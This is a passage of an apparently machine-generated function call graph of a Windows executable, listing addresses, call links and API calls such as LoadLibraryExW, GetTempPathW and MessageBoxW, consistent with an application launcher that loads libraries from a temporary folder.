16449->16785 16450 7ff7ff58391b 16794 7ff7ff5845b0 16450->16794 16454 7ff7ff58385b 16697 7ff7ff588a20 16454->16697 16455 7ff7ff58396a 16817 7ff7ff582710 16455->16817 16459 7ff7ff58388e 16466 7ff7ff5838bb __std_exception_destroy 16459->16466 16789 7ff7ff588b90 16459->16789 16460 7ff7ff58395d 16461 7ff7ff583984 16460->16461 16462 7ff7ff583962 16460->16462 16465 7ff7ff581c80 49 API calls 16461->16465 16813 7ff7ff5900bc 16462->16813 16467 7ff7ff5839a3 16465->16467 16468 7ff7ff588a20 14 API calls 16466->16468 16476 7ff7ff5838de __std_exception_destroy 16466->16476 16471 7ff7ff581950 115 API calls 16467->16471 16468->16476 16470 7ff7ff583a0b 16472 7ff7ff588b90 40 API calls 16470->16472 16473 7ff7ff5839ce 16471->16473 16474 7ff7ff583a17 16472->16474 16473->16454 16475 7ff7ff5839de 16473->16475 16477 7ff7ff588b90 40 API calls 16474->16477 16478 7ff7ff582710 54 API calls 16475->16478 16481 7ff7ff58390e __std_exception_destroy 16476->16481 16828 7ff7ff588b30 16476->16828 16479 7ff7ff583a23 16477->16479 16487 7ff7ff583808 __std_exception_destroy 16478->16487 16480 7ff7ff588b90 40 API calls 16479->16480 16480->16481 16482 7ff7ff588a20 14 API calls 16481->16482 16483 7ff7ff583a3b 16482->16483 16484 7ff7ff583b2f 16483->16484 16485 7ff7ff583a60 __std_exception_destroy 16483->16485 16486 7ff7ff582710 54 API calls 16484->16486 16488 7ff7ff588b30 40 API calls 16485->16488 16496 7ff7ff583aab 16485->16496 16486->16487 16487->16446 16488->16496 16489 7ff7ff588a20 14 API calls 16490 7ff7ff583bf4 __std_exception_destroy 16489->16490 16491 7ff7ff583c46 16490->16491 16492 7ff7ff583d41 16490->16492 16493 7ff7ff583cd4 16491->16493 16494 7ff7ff583c50 16491->16494 16835 7ff7ff5844d0 16492->16835 16498 7ff7ff588a20 14 API calls 16493->16498 16710 7ff7ff5890e0 16494->16710 16496->16489 16501 7ff7ff583ce0 16498->16501 16499 7ff7ff583d4f 16502 7ff7ff583d65 16499->16502 16503 7ff7ff583d71 16499->16503 16504 7ff7ff583c61 16501->16504 16508 7ff7ff583ced 16501->16508 16838 7ff7ff584620 16502->16838 16506 7ff7ff581c80 49 API calls 16503->16506 16511 7ff7ff582710 54 API calls 16504->16511 16517 7ff7ff583cc8 __std_exception_destroy 16506->16517 16512 7ff7ff581c80 49 API calls 16508->16512 16509 7ff7ff583dc4 16760 7ff7ff589400 16509->16760 16511->16487 16514 7ff7ff583d0b 16512->16514 16514->16517 16518 7ff7ff583d12 16514->16518 16515 7ff7ff583da7 SetDllDirectoryW LoadLibraryExW 16515->16509 16516 7ff7ff583dd7 SetDllDirectoryW 16521 7ff7ff583e0a 16516->16521 16564 7ff7ff583e5a 16516->16564 16517->16509 16517->16515 16519 7ff7ff582710 54 API calls 16518->16519 16519->16487 16523 7ff7ff588a20 14 API calls 16521->16523 16522 7ff7ff583ffc 16525 7ff7ff584029 16522->16525 16526 7ff7ff584006 PostMessageW GetMessageW 16522->16526 16529 7ff7ff583e16 __std_exception_destroy 16523->16529 16524 7ff7ff583f1b 16765 7ff7ff5833c0 16524->16765 16915 7ff7ff583360 16525->16915 16526->16525 16531 7ff7ff583ef2 16529->16531 16535 7ff7ff583e4e 16529->16535 16534 7ff7ff588b30 40 API calls 16531->16534 16534->16564 16535->16564 16841 7ff7ff586db0 16535->16841 16542 7ff7ff586fb0 FreeLibrary 16543 7ff7ff58404f 16542->16543 16551 7ff7ff583e81 16553 7ff7ff583ea2 16551->16553 16565 7ff7ff583e85 16551->16565 16862 7ff7ff586df0 16551->16862 16553->16565 16881 7ff7ff5871a0 16553->16881 16564->16522 16564->16524 16565->16564 16897 7ff7ff582a50 16565->16897 16574 7ff7ff599bd4 16573->16574 16575 7ff7ff599bb3 16573->16575 16576 7ff7ff59a448 45 API calls 16574->16576 16575->16419 16577 7ff7ff599bd9 16576->16577 16579 7ff7ff58d339 16578->16579 16579->16427 16582 7ff7ff58d011 16580->16582 16581 7ff7ff58cdd0 16581->16417 16582->16581 16583 7ff7ff58d8f8 7 API calls 16582->16583 16583->16581 16585 7ff7ff58d1c2 __FrameHandler3::FrameUnwindToEmptyState __scrt_get_show_window_mode 16584->16585 16586 7ff7ff58d1e1 RtlCaptureContext RtlLookupFunctionEntry 16585->16586 16587 7ff7ff58d246 __scrt_get_show_window_mode 16586->16587 16588 7ff7ff58d20a RtlVirtualUnwind 16586->16588 16589 7ff7ff58d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16587->16589 16588->16587 16590 7ff7ff58d2c6 __FrameHandler3::FrameUnwindToEmptyState 16589->16590 16590->16415 16592 7ff7ff58d900 16591->16592 16593 7ff7ff58d90a 16591->16593 16597 7ff7ff58dc94 16592->16597 16593->16433 16598 7ff7ff58dca3 16597->16598 16600 7ff7ff58d905 16597->16600 16605 7ff7ff58ded0 16598->16605 16601 7ff7ff58dd00 16600->16601 16602 7ff7ff58dd2b 16601->16602 16603 7ff7ff58dd2f 16602->16603 16604 7ff7ff58dd0e DeleteCriticalSection 16602->16604 16603->16593 16604->16602 16609 7ff7ff58dd38 16605->16609 16610 7ff7ff58de22 TlsFree 16609->16610 16611 7ff7ff58dd7c __vcrt_FlsAlloc 16609->16611 16611->16610 16612 7ff7ff58ddaa LoadLibraryExW 16611->16612 16613 7ff7ff58de69 GetProcAddress 16611->16613 16617 7ff7ff58dded LoadLibraryExW 16611->16617 16614 7ff7ff58de49 16612->16614 16615 7ff7ff58ddcb GetLastError 16612->16615 16613->16610 16614->16613 16616 7ff7ff58de60 FreeLibrary 16614->16616 16615->16611 16616->16613 16617->16611 16617->16614 16621 7ff7ff59f4f0 16618->16621 16619 7ff7ff59f543 16620 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 16619->16620 16624 7ff7ff59f56c 16620->16624 16621->16619 16622 7ff7ff59f596 16621->16622 16928 7ff7ff59f3c8 16622->16928 16624->16442 16936 7ff7ff58c8c0 16625->16936 16628 7ff7ff5836eb GetLastError 16943 7ff7ff582c50 16628->16943 16629 7ff7ff583710 16938 7ff7ff5892f0 FindFirstFileExW 16629->16938 16632 7ff7ff583706 16637 7ff7ff58c5c0 _log10_special 8 API calls 16632->16637 16634 7ff7ff58377d 16969 7ff7ff5894b0 16634->16969 16635 7ff7ff583723 16958 7ff7ff589370 CreateFileW 16635->16958 16640 7ff7ff5837b5 16637->16640 16639 7ff7ff58378b 16639->16632 16644 7ff7ff582810 49 API calls 16639->16644 16640->16487 16647 7ff7ff581950 16640->16647 16642 7ff7ff58374c __vcrt_FlsAlloc 16642->16634 16643 7ff7ff583734 16961 7ff7ff582810 16643->16961 16644->16632 16648 7ff7ff5845b0 108 API calls 16647->16648 16649 7ff7ff581985 16648->16649 16650 7ff7ff581c43 16649->16650 16651 7ff7ff587f80 83 API calls 16649->16651 16652 7ff7ff58c5c0 _log10_special 8 API calls 16650->16652 16653 7ff7ff5819cb 16651->16653 16654 7ff7ff581c5e 16652->16654 16696 7ff7ff581a03 16653->16696 17326 7ff7ff590744 16653->17326 16654->16449 16654->16450 16656 7ff7ff5900bc 74 API calls 16656->16650 16657 7ff7ff5819e5 16658 7ff7ff5819e9 16657->16658 16659 7ff7ff581a08 16657->16659 16660 7ff7ff594f78 _set_fmode 11 API calls 16658->16660 17330 7ff7ff59040c 16659->17330 16663 7ff7ff5819ee 16660->16663 17333 7ff7ff582910 16663->17333 16664 7ff7ff581a26 16667 7ff7ff594f78 _set_fmode 11 API calls 16664->16667 16665 7ff7ff581a45 16670 7ff7ff581a5c 16665->16670 16671 7ff7ff581a7b 16665->16671 16668 7ff7ff581a2b 16667->16668 16669 7ff7ff582910 54 API calls 16668->16669 16669->16696 16672 7ff7ff594f78 _set_fmode 11 API calls 16670->16672 16673 7ff7ff581c80 49 API calls 16671->16673 16675 7ff7ff581a61 16672->16675 16674 7ff7ff581a92 16673->16674 16676 7ff7ff581c80 49 API calls 16674->16676 16677 7ff7ff582910 54 API calls 16675->16677 16678 7ff7ff581add 16676->16678 16677->16696 16679 7ff7ff590744 73 API calls 16678->16679 16680 7ff7ff581b01 16679->16680 16681 7ff7ff581b16 16680->16681 16682 7ff7ff581b35 16680->16682 16683 7ff7ff594f78 _set_fmode 11 API calls 16681->16683 16684 7ff7ff59040c _fread_nolock 53 API calls 16682->16684 16685 7ff7ff581b1b 16683->16685 16686 7ff7ff581b4a 16684->16686 16687 7ff7ff582910 54 API calls 16685->16687 16688 7ff7ff581b50 16686->16688 16689 7ff7ff581b6f 16686->16689 16687->16696 16690 7ff7ff594f78 _set_fmode 11 API calls 16688->16690 17348 7ff7ff590180 16689->17348 16692 7ff7ff581b55 16690->16692 16694 7ff7ff582910 54 API calls 16692->16694 16694->16696 16695 7ff7ff582710 54 API calls 16695->16696 16696->16656 16698 7ff7ff588a2a 16697->16698 16699 7ff7ff589400 2 API calls 16698->16699 16700 7ff7ff588a49 GetEnvironmentVariableW 16699->16700 16701 7ff7ff588ab2 16700->16701 16702 7ff7ff588a66 ExpandEnvironmentStringsW 16700->16702 16703 7ff7ff58c5c0 _log10_special 8 API calls 16701->16703 16702->16701 16704 7ff7ff588a88 16702->16704 16705 7ff7ff588ac4 16703->16705 16706 7ff7ff5894b0 2 API calls 16704->16706 16705->16459 16707 7ff7ff588a9a 16706->16707 16708 7ff7ff58c5c0 _log10_special 8 API calls 16707->16708 16709 7ff7ff588aaa 16708->16709 16709->16459 16711 7ff7ff5890f5 16710->16711 17566 7ff7ff588760 GetCurrentProcess OpenProcessToken 16711->17566 16714 7ff7ff588760 7 API calls 16715 7ff7ff589121 16714->16715 16716 7ff7ff589154 16715->16716 16717 7ff7ff58913a 16715->16717 16719 7ff7ff5826b0 48 API calls 16716->16719 16718 7ff7ff5826b0 48 API calls 16717->16718 16720 7ff7ff589152 16718->16720 16721 7ff7ff589167 LocalFree LocalFree 16719->16721 16720->16721 16722 7ff7ff589183 16721->16722 16724 7ff7ff58918f 16721->16724 17576 7ff7ff582b50 16722->17576 16725 7ff7ff58c5c0 _log10_special 8 API calls 16724->16725 16726 7ff7ff583c55 16725->16726 16726->16504 16727 7ff7ff588850 16726->16727 16728 7ff7ff588868 16727->16728 16729 7ff7ff5888ea GetTempPathW GetCurrentProcessId 16728->16729 16730 7ff7ff58888c 16728->16730 17585 7ff7ff5825c0 16729->17585 16732 7ff7ff588a20 14 API calls 16730->16732 16733 7ff7ff588898 16732->16733 17592 7ff7ff5881c0 16733->17592 16738 7ff7ff5888d8 __std_exception_destroy 16759 7ff7ff5889c4 __std_exception_destroy 16738->16759 16740 7ff7ff588918 __std_exception_destroy 16746 7ff7ff588955 __std_exception_destroy 16740->16746 17589 7ff7ff598bd8 16740->17589 16742 7ff7ff5888be __std_exception_destroy 16742->16729 16749 7ff7ff5888cc 16742->16749 16745 7ff7ff58c5c0 _log10_special 8 API calls 16748 7ff7ff583cbb 16745->16748 16751 7ff7ff589400 2 API calls 16746->16751 16746->16759 16748->16504 16748->16517 16750 7ff7ff582810 49 API calls 16749->16750 16750->16738 16752 7ff7ff5889a1 16751->16752 16753 7ff7ff5889a6 16752->16753 16754 7ff7ff5889d9 16752->16754 16756 7ff7ff589400 2 API calls 16753->16756 16755 7ff7ff5982a8 38 API calls 16754->16755 16755->16759 16757 7ff7ff5889b6 16756->16757 16758 7ff7ff5982a8 38 API calls 16757->16758 16758->16759 16759->16745 16761 7ff7ff589422 MultiByteToWideChar 16760->16761 16763 7ff7ff589446 16760->16763 16761->16763 16764 7ff7ff58945c __std_exception_destroy 16761->16764 16762 7ff7ff589463 MultiByteToWideChar 16762->16764 16763->16762 16763->16764 16764->16516 16777 7ff7ff5833ce __scrt_get_show_window_mode 16765->16777 16766 7ff7ff58c5c0 _log10_special 8 API calls 16768 7ff7ff583664 16766->16768 16767 7ff7ff5835c7 16767->16766 16768->16487 16784 7ff7ff5890c0 LocalFree 16768->16784 16770 7ff7ff581c80 49 API calls 16770->16777 16771 7ff7ff5835e2 16773 7ff7ff582710 54 API calls 16771->16773 16773->16767 16776 7ff7ff5835c9 16779 7ff7ff582710 54 API calls 16776->16779 16777->16767 16777->16770 16777->16771 16777->16776 16778 7ff7ff582a50 54 API calls 16777->16778 16782 7ff7ff5835d0 16777->16782 17781 7ff7ff584550 16777->17781 17787 7ff7ff587e10 16777->17787 17799 7ff7ff581600 16777->17799 17847 7ff7ff587110 16777->17847 17851 7ff7ff584180 16777->17851 17895 7ff7ff584440 16777->17895 16778->16777 16779->16767 16783 7ff7ff582710 54 API calls 16782->16783 16783->16767 16786 7ff7ff581ca5 16785->16786 16787 7ff7ff5949f4 49 API calls 16786->16787 16788 7ff7ff581cc8 16787->16788 16788->16454 16790 7ff7ff589400 2 API calls 16789->16790 16791 7ff7ff588ba4 16790->16791 16792 7ff7ff5982a8 38 API calls 16791->16792 16793 7ff7ff588bb6 __std_exception_destroy 16792->16793 16793->16466 16795 7ff7ff5845bc 16794->16795 16796 7ff7ff589400 2 API calls 16795->16796 16797 7ff7ff5845e4 16796->16797 16798 7ff7ff589400 2 API calls 16797->16798 16799 7ff7ff5845f7 16798->16799 18062 7ff7ff596004 16799->18062 16802 7ff7ff58c5c0 _log10_special 8 API calls 16803 7ff7ff58392b 16802->16803 16803->16455 16804 7ff7ff587f80 16803->16804 16805 7ff7ff587fa4 16804->16805 16806 7ff7ff590744 73 API calls 16805->16806 16809 7ff7ff58807b __std_exception_destroy 16805->16809 16807 7ff7ff587fc0 16806->16807 16807->16809 18454 7ff7ff597938 16807->18454 16809->16460 16810 7ff7ff590744 73 API calls 16812 7ff7ff587fd5 16810->16812 16811 7ff7ff59040c _fread_nolock 53 API calls 16811->16812 16812->16809 16812->16810 16812->16811 16814 7ff7ff5900ec 16813->16814 18469 7ff7ff58fe98 16814->18469 16816 7ff7ff590105 16816->16455 16818 7ff7ff58c8c0 16817->16818 16819 7ff7ff582734 GetCurrentProcessId 16818->16819 16820 7ff7ff581c80 49 API calls 16819->16820 16821 7ff7ff582787 16820->16821 16822 7ff7ff5949f4 49 API calls 16821->16822 16823 7ff7ff5827cf 16822->16823 16824 7ff7ff582620 12 API calls 16823->16824 16825 7ff7ff5827f1 16824->16825 16826 7ff7ff58c5c0 _log10_special 8 API calls 16825->16826 16827 7ff7ff582801 16826->16827 16827->16487 16829 7ff7ff589400 2 API calls 16828->16829 16830 7ff7ff588b4c 16829->16830 16831 7ff7ff589400 2 API calls 16830->16831 16832 7ff7ff588b5c 16831->16832 16833 7ff7ff5982a8 38 API calls 16832->16833 16834 7ff7ff588b6a __std_exception_destroy 16833->16834 16834->16470 16836 7ff7ff581c80 49 API calls 16835->16836 16837 7ff7ff5844ed 16836->16837 16837->16499 16839 7ff7ff581c80 49 API calls 16838->16839 16840 7ff7ff584650 16839->16840 16840->16517 16842 7ff7ff586dc5 16841->16842 16843 7ff7ff583e6c 16842->16843 16844 7ff7ff594f78 _set_fmode 11 API calls 16842->16844 16847 7ff7ff587330 16843->16847 16845 7ff7ff586dd2 16844->16845 16846 7ff7ff582910 54 API calls 16845->16846 16846->16843 18480 7ff7ff581470 16847->18480 16849 7ff7ff587358 16850 7ff7ff584620 49 API calls 16849->16850 16860 7ff7ff5874a9 __std_exception_destroy 16849->16860 16851 7ff7ff58737a 16850->16851 16852 7ff7ff58737f 16851->16852 16853 7ff7ff584620 49 API calls 16851->16853 16854 7ff7ff582a50 54 API calls 16852->16854 16855 7ff7ff58739e 16853->16855 16854->16860 16855->16852 16856 7ff7ff584620 49 API calls 16855->16856 16857 7ff7ff5873ba 16856->16857 16857->16852 16858 7ff7ff5873c3 16857->16858 16859 7ff7ff582710 54 API calls 16858->16859 16861 7ff7ff587433 __std_exception_destroy memcpy_s 16858->16861 16859->16860 16860->16551 16861->16551 16878 7ff7ff586e0c 16862->16878 16863 7ff7ff586f2f 16864 7ff7ff58c5c0 _log10_special 8 API calls 16863->16864 16865 7ff7ff586f41 16864->16865 16865->16553 16866 7ff7ff581840 45 API calls 16866->16878 16867 7ff7ff586f9a 16869 7ff7ff582710 54 API calls 16867->16869 16868 7ff7ff581c80 49 API calls 16868->16878 16869->16863 16870 7ff7ff586f87 16872 7ff7ff582710 54 API calls 16870->16872 16871 7ff7ff584550 10 API calls 16871->16878 16872->16863 16873 7ff7ff587e10 52 API calls 16873->16878 16874 7ff7ff582a50 54 API calls 16874->16878 16875 7ff7ff586f74 16876 7ff7ff582710 54 API calls 16875->16876 16876->16863 16877 7ff7ff581600 118 API calls 16877->16878 16878->16863 16878->16866 16878->16867 16878->16868 16878->16870 16878->16871 16878->16873 16878->16874 16878->16875 16878->16877 16879 7ff7ff586f5d 16878->16879 16880 7ff7ff582710 54 API calls 16879->16880 16880->16863 18510 7ff7ff589070 16881->18510 16883 7ff7ff5871b9 16884 7ff7ff589070 3 API calls 16883->16884 16886 7ff7ff5871cc 16884->16886 16885 7ff7ff5871ff 16887 7ff7ff582710 54 API calls 16885->16887 16886->16885 16888 7ff7ff5871e4 16886->16888 16889 7ff7ff583eb7 16887->16889 18514 7ff7ff5876b0 GetProcAddress 16888->18514 16889->16565 16898 7ff7ff58c8c0 16897->16898 16899 7ff7ff582a74 GetCurrentProcessId 16898->16899 16900 7ff7ff581c80 49 API calls 16899->16900 16901 7ff7ff582ac7 16900->16901 16902 7ff7ff5949f4 49 API calls 16901->16902 16903 7ff7ff582b0f 16902->16903 16904 7ff7ff582620 12 API calls 16903->16904 16905 7ff7ff582b31 16904->16905 16906 7ff7ff58c5c0 _log10_special 8 API calls 16905->16906 16907 7ff7ff582b41 16906->16907 18586 7ff7ff586350 16915->18586 16919 7ff7ff583381 16923 7ff7ff583399 16919->16923 18654 7ff7ff586040 16919->18654 16921 7ff7ff58338d 16921->16923 18663 7ff7ff5861d0 16921->18663 16924 7ff7ff583670 16923->16924 16925 7ff7ff58367e 16924->16925 16927 7ff7ff58368f 16925->16927 18874 7ff7ff589050 FreeLibrary 16925->18874 16927->16542 16935 7ff7ff5954dc EnterCriticalSection 16928->16935 16937 7ff7ff5836bc GetModuleFileNameW 16936->16937 16937->16628 16937->16629 16939 7ff7ff58932f FindClose 16938->16939 16940 7ff7ff589342 16938->16940 16939->16940 16941 7ff7ff58c5c0 _log10_special 8 API calls 16940->16941 16942 7ff7ff58371a 16941->16942 16942->16634 16942->16635 16944 7ff7ff58c8c0 16943->16944 16945 7ff7ff582c70 GetCurrentProcessId 16944->16945 16974 7ff7ff5826b0 16945->16974 16947 7ff7ff582cb9 16978 7ff7ff594c48 16947->16978 16950 7ff7ff5826b0 48 API calls 16951 7ff7ff582d34 FormatMessageW 16950->16951 16953 7ff7ff582d6d 16951->16953 16954 7ff7ff582d7f MessageBoxW 16951->16954 16955 7ff7ff5826b0 48 API calls 16953->16955 16956 7ff7ff58c5c0 _log10_special 8 API calls 16954->16956 16955->16954 16957 7ff7ff582daf 16956->16957 16957->16632 16959 7ff7ff5893b0 GetFinalPathNameByHandleW CloseHandle 16958->16959 16960 7ff7ff583730 16958->16960 16959->16960 16960->16642 16960->16643 16962 7ff7ff582834 16961->16962 16963 7ff7ff5826b0 48 API calls 16962->16963 16964 7ff7ff582887 16963->16964 16965 7ff7ff594c48 48 API calls 16964->16965 16966 7ff7ff5828d0 MessageBoxW 16965->16966 16967 7ff7ff58c5c0 _log10_special 8 API calls 16966->16967 16968 7ff7ff582900 16967->16968 16968->16632 16970 7ff7ff5894da WideCharToMultiByte 16969->16970 16971 7ff7ff589505 16969->16971 16970->16971 16972 7ff7ff58951b __std_exception_destroy 16970->16972 16971->16972 16973 7ff7ff589522 WideCharToMultiByte 16971->16973 16972->16639 16973->16972 16975 7ff7ff5826d5 16974->16975 16976 7ff7ff594c48 48 API calls 16975->16976 16977 7ff7ff5826f8 16976->16977 16977->16947 16980 7ff7ff594ca2 16978->16980 16979 7ff7ff594cc7 16981 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 16979->16981 16980->16979 16982 7ff7ff594d03 16980->16982 16995 7ff7ff594cf1 16981->16995 16996 7ff7ff593000 16982->16996 16985 7ff7ff58c5c0 _log10_special 8 API calls 16987 7ff7ff582d04 16985->16987 16986 7ff7ff59a9b8 __free_lconv_num 11 API calls 16986->16995 16987->16950 16988 7ff7ff594de4 16988->16986 16989 7ff7ff594db9 16991 7ff7ff59a9b8 __free_lconv_num 11 API calls 16989->16991 16990 7ff7ff594e0a 16990->16988 16993 7ff7ff594e14 16990->16993 16991->16995 16992 7ff7ff594db0 16992->16988 16992->16989 16994 7ff7ff59a9b8 __free_lconv_num 11 API calls 16993->16994 16994->16995 16995->16985 16997 7ff7ff59303e 16996->16997 17002 7ff7ff59302e 16996->17002 16998 7ff7ff593047 16997->16998 17003 7ff7ff593075 16997->17003 17000 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 16998->17000 16999 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17001 7ff7ff59306d 16999->17001 17000->17001 17001->16988 17001->16989 17001->16990 17001->16992 17002->16999 17003->17001 17003->17002 17007 7ff7ff593a14 17003->17007 17040 7ff7ff593460 17003->17040 17077 7ff7ff592bf0 17003->17077 17008 7ff7ff593a56 17007->17008 17009 7ff7ff593ac7 17007->17009 17010 7ff7ff593af1 17008->17010 17011 7ff7ff593a5c 17008->17011 17012 7ff7ff593b20 17009->17012 17013 7ff7ff593acc 17009->17013 17100 7ff7ff591dc4 17010->17100 17014 7ff7ff593a90 17011->17014 17015 7ff7ff593a61 17011->17015 17019 7ff7ff593b37 17012->17019 17021 7ff7ff593b2a 17012->17021 17026 7ff7ff593b2f 17012->17026 17016 7ff7ff593b01 17013->17016 17017 7ff7ff593ace 17013->17017 17022 7ff7ff593a67 17014->17022 17014->17026 17015->17019 17015->17022 17107 7ff7ff5919b4 17016->17107 17020 7ff7ff593a70 17017->17020 17029 7ff7ff593add 17017->17029 17114 7ff7ff59471c 17019->17114 17038 7ff7ff593b60 17020->17038 17080 7ff7ff5941c8 17020->17080 17021->17010 17021->17026 17022->17020 17027 7ff7ff593aa2 17022->17027 17035 7ff7ff593a8b 17022->17035 17026->17038 17118 7ff7ff5921d4 17026->17118 17027->17038 17090 7ff7ff594504 17027->17090 17029->17010 17031 7ff7ff593ae2 17029->17031 17031->17038 17096 7ff7ff5945c8 17031->17096 17032 7ff7ff58c5c0 _log10_special 8 API calls 17033 7ff7ff593e5a 17032->17033 17033->17003 17035->17038 17039 7ff7ff593d4c 17035->17039 17125 7ff7ff594830 17035->17125 17038->17032 17039->17038 17131 7ff7ff59ea78 17039->17131 17041 7ff7ff593484 17040->17041 17042 7ff7ff59346e 17040->17042 17043 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17041->17043 17056 7ff7ff5934c4 17041->17056 17044 7ff7ff593a56 17042->17044 17045 7ff7ff593ac7 17042->17045 17042->17056 17043->17056 17046 7ff7ff593af1 17044->17046 17047 7ff7ff593a5c 17044->17047 17048 7ff7ff593b20 17045->17048 17049 7ff7ff593acc 17045->17049 17054 7ff7ff591dc4 38 API calls 17046->17054 17050 7ff7ff593a90 17047->17050 17051 7ff7ff593a61 17047->17051 17055 7ff7ff593b37 17048->17055 17058 7ff7ff593b2a 17048->17058 17063 7ff7ff593b2f 17048->17063 17052 7ff7ff593b01 17049->17052 17053 7ff7ff593ace 17049->17053 17059 7ff7ff593a67 17050->17059 17050->17063 17051->17055 17051->17059 17061 7ff7ff5919b4 38 API calls 17052->17061 17057 7ff7ff593a70 17053->17057 17066 7ff7ff593add 17053->17066 17072 7ff7ff593a8b 17054->17072 17060 7ff7ff59471c 45 API calls 17055->17060 17056->17003 17062 7ff7ff5941c8 47 API calls 17057->17062 17075 7ff7ff593b60 17057->17075 17058->17046 17058->17063 17059->17057 17064 7ff7ff593aa2 17059->17064 17059->17072 17060->17072 17061->17072 17062->17072 17065 7ff7ff5921d4 38 API calls 17063->17065 17063->17075 17067 7ff7ff594504 46 API calls 17064->17067 17064->17075 17065->17072 17066->17046 17068 7ff7ff593ae2 17066->17068 17067->17072 17070 7ff7ff5945c8 37 API calls 17068->17070 17068->17075 17069 7ff7ff58c5c0 _log10_special 8 API calls 17071 7ff7ff593e5a 17069->17071 17070->17072 17071->17003 17073 7ff7ff594830 45 API calls 17072->17073 17072->17075 17076 7ff7ff593d4c 17072->17076 17073->17076 17074 7ff7ff59ea78 46 API calls 17074->17076 17075->17069 17076->17074 17076->17075 17309 7ff7ff591038 17077->17309 17081 7ff7ff5941ee 17080->17081 17143 7ff7ff590bf0 17081->17143 17086 7ff7ff594830 45 API calls 17088 7ff7ff594333 17086->17088 17087 7ff7ff594830 45 API calls 17089 7ff7ff5943c1 17087->17089 17088->17087 17088->17088 17088->17089 17089->17035 17091 7ff7ff594539 17090->17091 17092 7ff7ff594557 17091->17092 17093 7ff7ff594830 45 API calls 17091->17093 17095 7ff7ff59457e 17091->17095 17094 7ff7ff59ea78 46 API calls 17092->17094 17093->17092 17094->17095 17095->17035 17099 7ff7ff5945e9 17096->17099 17097 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17098 7ff7ff59461a 17097->17098 17098->17035 17099->17097 17099->17098 17101 7ff7ff591df7 17100->17101 17102 7ff7ff591e26 17101->17102 17104 7ff7ff591ee3 17101->17104 17106 7ff7ff591e63 17102->17106 17279 7ff7ff590c98 17102->17279 17105 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17104->17105 17105->17106 17106->17035 17108 7ff7ff5919e7 17107->17108 17109 7ff7ff591a16 17108->17109 17112 7ff7ff591ad3 17108->17112 17110 7ff7ff591a53 17109->17110 17111 7ff7ff590c98 12 API calls 17109->17111 17110->17035 17111->17110 17113 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17112->17113 17113->17110 17115 7ff7ff59475f 17114->17115 17117 7ff7ff594763 __crtLCMapStringW 17115->17117 17287 7ff7ff5947b8 17115->17287 17117->17035 17119 7ff7ff592207 17118->17119 17120 7ff7ff592236 17119->17120 17122 7ff7ff5922f3 17119->17122 17121 7ff7ff590c98 12 API calls 17120->17121 17124 7ff7ff592273 17120->17124 17121->17124 17123 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17122->17123 17123->17124 17124->17035 17126 7ff7ff594847 17125->17126 17291 7ff7ff59da28 17126->17291 17132 7ff7ff59eaa9 17131->17132 17140 7ff7ff59eab7 17131->17140 17133 7ff7ff59ead7 17132->17133 17134 7ff7ff594830 45 API calls 17132->17134 17132->17140 17135 7ff7ff59eb0f 17133->17135 17136 7ff7ff59eae8 17133->17136 17134->17133 17138 7ff7ff59eb9a 17135->17138 17139 7ff7ff59eb39 17135->17139 17135->17140 17299 7ff7ff5a0110 17136->17299 17141 7ff7ff59f910 _fread_nolock MultiByteToWideChar 17138->17141 17139->17140 17302 7ff7ff59f910 17139->17302 17140->17039 17141->17140 17144 7ff7ff590c27 17143->17144 17150 7ff7ff590c16 17143->17150 17145 7ff7ff59d66c _fread_nolock 12 API calls 17144->17145 17144->17150 17147 7ff7ff590c54 17145->17147 17146 7ff7ff590c68 17149 7ff7ff59a9b8 __free_lconv_num 11 API calls 17146->17149 17147->17146 17148 7ff7ff59a9b8 __free_lconv_num 11 API calls 17147->17148 17148->17146 17149->17150 17151 7ff7ff59e5e0 17150->17151 17152 7ff7ff59e630 17151->17152 17153 7ff7ff59e5fd 17151->17153 17152->17153 17155 7ff7ff59e662 17152->17155 17154 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17153->17154 17164 7ff7ff594311 17154->17164 17156 7ff7ff59e775 17155->17156 17168 7ff7ff59e6aa 17155->17168 17157 7ff7ff59e867 17156->17157 17159 7ff7ff59e82d 17156->17159 17160 7ff7ff59e7fc 17156->17160 17162 7ff7ff59e7bf 17156->17162 17165 7ff7ff59e7b5 17156->17165 17206 7ff7ff59dacc 17157->17206 17199 7ff7ff59de64 17159->17199 17192 7ff7ff59e144 17160->17192 17182 7ff7ff59e374 17162->17182 17164->17086 17164->17088 17165->17159 17167 7ff7ff59e7ba 17165->17167 17167->17160 17167->17162 17168->17164 17173 7ff7ff59a514 17168->17173 17171 7ff7ff59a970 _isindst 17 API calls 17172 7ff7ff59e8c4 17171->17172 17174 7ff7ff59a521 17173->17174 17175 7ff7ff59a52b 17173->17175 17174->17175 17180 7ff7ff59a546 17174->17180 17176 7ff7ff594f78 _set_fmode 11 API calls 17175->17176 17177 7ff7ff59a532 17176->17177 17178 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17177->17178 17179 7ff7ff59a53e 17178->17179 17179->17164 17179->17171 17180->17179 17181 7ff7ff594f78 _set_fmode 11 API calls 17180->17181 17181->17177 17215 7ff7ff5a411c 17182->17215 17186 7ff7ff59e41c 17187 7ff7ff59e471 17186->17187 17189 7ff7ff59e43c 17186->17189 17191 7ff7ff59e420 17186->17191 17268 7ff7ff59df60 17187->17268 17264 7ff7ff59e21c 17189->17264 17191->17164 17193 7ff7ff5a411c 38 API calls 17192->17193 17194 7ff7ff59e18e 17193->17194 17195 7ff7ff5a3b64 37 API calls 17194->17195 17196 7ff7ff59e1de 17195->17196 17197 7ff7ff59e1e2 17196->17197 17198 7ff7ff59e21c 45 API calls 17196->17198 17197->17164 17198->17197 17200 7ff7ff5a411c 38 API calls 17199->17200 17201 7ff7ff59deaf 17200->17201 17202 7ff7ff5a3b64 37 API calls 17201->17202 17203 7ff7ff59df07 17202->17203 17204 7ff7ff59df0b 17203->17204 17205 7ff7ff59df60 45 API calls 17203->17205 17204->17164 17205->17204 17207 7ff7ff59db11 17206->17207 17208 7ff7ff59db44 17206->17208 17209 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 